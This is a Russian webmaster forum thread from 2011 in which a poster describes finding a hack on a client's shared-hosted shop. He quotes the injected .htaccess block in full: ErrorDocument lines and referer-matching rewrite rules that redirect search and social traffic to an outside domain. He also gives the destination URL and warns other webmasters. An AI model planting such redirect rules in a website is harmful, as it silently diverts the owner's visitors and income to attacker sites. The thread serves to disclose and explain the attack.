X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> А вы давно проверяли свой htaccess ;) ?, Взламывают ... но красиво!
LihKo
LihKo
Topic Starter сообщение 17.6.2011, 1:27; Ответить: LihKo
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 594
Регистрация: 12.5.2009
Из: NN
Поблагодарили: 163 раза
Репутация:   36  


Приветствую всех.
Вчера, звонит мне один из моих бывших клиентов. Говорит, что мол резко траф упал и все такое, народу нет, беда, горит и тд...
Ну в общем сопли, слюни и все такое. Признаться, я даже "про себя" начал злорадствовать.
На днях предлагал ему по договору полное обслуживание под ключ, а он типа, "сами с усами", не буду мол тратить деньги за воздух.
А предлагал то всего-навсего перенести его магазин+форум ко мне на сервак, ну и стандартное админинистрирование, все по божески, тем более знакомы давно.
Но нет, пошел человек своей дорогой - шаред хост за 10$/мес и типа счастлив ....
Ну да ладно, сейчас не об этом. Так вот, пуская сопли пузырем, кричит, что не может понять в чем дело, народу и заказов нет, на форуме странная тишина.
Помоги!
Взял у него доступ, полез смотреть, что и как ...
Даже первые минут десять был озадачен. Позиции на месте, индексация как и была. Навигация и функционал - как и было ... даже странно... народу действительно нет.
Начал смотреть логи и чуть со стула не упал!!! smile.gif)))
Ни одного "нормального" 200 ответа, кроме прямых заходов.
И вот она "ласточка":
ErrorDocument 400 http://switch-window.ru/insertindex.php                
ErrorDocument 401 http://switch-window.ru/insert/index.php                
ErrorDocument 403 http://switch-window.ru/insert/index.php                
ErrorDocument 404 http://switch-window.ru/insert/index.php                
ErrorDocument 500 http://switch-window.ru/insert/index.php                
RewriteCond %{HTTP_REFERER} .*google.* [OR]                        
RewriteCond %{HTTP_REFERER} .*ask.* [OR]                            
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]                        
RewriteCond %{HTTP_REFERER} .*baidu.* [OR]                        
RewriteCond %{HTTP_REFERER} .*youtube.* [OR]                        
RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]                        
RewriteCond %{HTTP_REFERER} .*qq.* [OR]                            
RewriteCond %{HTTP_REFERER} .*excite.* [OR]                        
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]                        
RewriteCond %{HTTP_REFERER} .*msn.* [OR]                        
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]                        
RewriteCond %{HTTP_REFERER} .*aol.* [OR]                            
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]                        
RewriteCond %{HTTP_REFERER} .*goto.* [OR]                        
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]                        
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]                        
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]                        
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]                        
RewriteCond %{HTTP_REFERER} .*search.* [OR]                        
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]                    
RewriteCond %{HTTP_REFERER} .*bing.* [OR]                        
RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]                        
RewriteCond %{HTTP_REFERER} .*facebook.* [OR]                        
RewriteCond %{HTTP_REFERER} .*twitter.* [OR]                        
RewriteCond %{HTTP_REFERER} .*blog.* [OR]                        
RewriteCond %{HTTP_REFERER} .*live.* [OR]                            
RewriteCond %{HTTP_REFERER} .*myspace.* [OR]                        
RewriteCond %{HTTP_REFERER} .*mail.* [OR]                        
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]                        
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]                        
RewriteCond %{HTTP_REFERER} .*ya.* [OR]                            
RewriteCond %{HTTP_REFERER} .*aport.* [OR]                        
RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]                        
RewriteCond %{HTTP_REFERER} .*flickr.*                            
RewriteRule ^(.*)$ http://switch-window.ru/insert/index.php [R=301,L]


Это было дописано в конец htaccess лежащего в корне.
Вы спросите, а причем тут посещалка? Да все гениально!
Я бы парням(тем кто это сделал) сначала даже может быть руку пожал за такую идею, ну а потом бы голову отвернул smile.gif))))
Для тех, кто "в танке" - правило работает на тех, кто идут с рефом(прописаным). Так например если пользователь приходит из поиска Яндекса, Гугла и тд, то он будет тут-же "телепортирован". При прямом заходе(например набор адреса в браузере ручками) - нет.
Куда? А вот сюда:
http://shara.lots-moment-archiv.ru/results.php?notds=1&query=host:vash-site.ru%20|%20host:www.vash-site.ru

(даю одну из возможных комбинаций, но акцептор редиректа, всегда один и тот-же. По крайней мере мне другой не попался.)

Кстати, проверил еще пару сайтов, что были на одном ip с магазином моего клинта - перебрал только 5 и все "болные", дальше не стал ...

Так что господа вебмастера - НЕ расслабляйтесь! wink.gif

Вот собственно и вся история - 45 минут работы и боооооооооооооольшой провал в посещалке магазина(выручке разумеется тоже). Скупой - как всегда - заплатил х2.

ЗЫ. Консультаций по аудиту безопасности сайтов не оказываю, ибо сам считаю себя слабо подготовленным в этой области. Для этого есть специально обученные люди, всегда работаю с такими, если что сам не могу решить. На форуме есть такие ...ищите ...


--------------------
В реальности, не все так, как кажется очевидным ...
@ Shell-init: permission denied


Поблагодарили: (1)
2
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
south_park
south_park
сообщение 17.6.2011, 1:33; Ответить: south_park
Сообщение #2


Лентяй и балбес хD
*****

Группа: Active User
Сообщений: 909
Регистрация: 25.2.2009
Из: Череповец
Поблагодарили: 240 раз
Репутация:   72  


Довольный клиент теперь торчит ящик пенящегося напитка? smile.gif


--------------------

Дешевые VPS,VDS,немецкое качество, много оперативки.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LihKo
LihKo
Topic Starter сообщение 17.6.2011, 1:59; Ответить: LihKo
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 594
Регистрация: 12.5.2009
Из: NN
Поблагодарили: 163 раза
Репутация:   36  


(south_park @ 17.6.2011, 1:33) *
Довольный клиент теперь торчит ящик пенящегося напитка? smile.gif

smile.gif Что-то типа такого.


--------------------
В реальности, не все так, как кажется очевидным ...
@ Shell-init: permission denied
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
prometeika
prometeika
сообщение 10.7.2011, 23:46; Ответить: prometeika
Сообщение #4


Участник
***

Группа: User
Сообщений: 101
Регистрация: 5.7.2011
Поблагодарили: 13 раз
Репутация:   1  


У меня этот файл вообще пустой. Это нормально? blink.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
super_repus
super_repus
сообщение 11.7.2011, 0:05; Ответить: super_repus
Сообщение #5


Частый гость
**

Группа: User
Сообщений: 89
Регистрация: 17.11.2010
Поблагодарили: 10 раз
Репутация:   0  


Не совсем понятно - это типа хостер чудеса такие вытворяет?
Или клиент вируса подхватил на сайт?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Psyholord
Psyholord
сообщение 11.7.2011, 0:16; Ответить: Psyholord
Сообщение #6


Яндексу не устоять
*****

Группа: Active User
Сообщений: 974
Регистрация: 20.2.2009
Из: Москва
Поблагодарили: 269 раз
Репутация:   31  


Вывод 1. Не юзайте гавно хостинг, свой сервак форевер.
Насчет идеи прикольно замутили молодцы.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
tilla
tilla
сообщение 11.7.2011, 0:29; Ответить: tilla
Сообщение #7


Участник
***

Группа: User
Сообщений: 185
Регистрация: 21.11.2010
Из: Тверь
Поблагодарили: 43 раза
Репутация:   9  


давно не смотрел что у меня там

<3 nginx smile.gif

Сообщение отредактировал tilla - 11.7.2011, 0:29


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) А как вы монетизируете свой ресурс?
Какие способы используете?
9 Retyk 1375 9.12.2017, 12:49
автор: rogefer
Открытая тема (нет новых ответов) Проблема с 301 редиректом в htaccess
не срабатывает с (без www) на www
14 danc1r0k 2004 2.11.2017, 14:44
автор: vadosseo
Открытая тема (нет новых ответов) Редирект в ModX через .htaccess коряво работает
9 kstnews 701 15.10.2017, 21:12
автор: x64
Открытая тема (нет новых ответов) Подними свой сайт в топ
Комплексные прогоны, статьи, профили
10 Card0 2226 7.10.2017, 12:33
автор: Card0
Открытая тема (нет новых ответов) Вёрстка адаптивная, Натяжка на DLE, WebAsyst, свой движок.
Полный спектр услуг по вёрстке и программированию.
27 Sergeo 2516 18.9.2017, 20:51
автор: Jawa


 



RSS Текстовая версия Сейчас: 18.12.2017, 19:08
Дизайн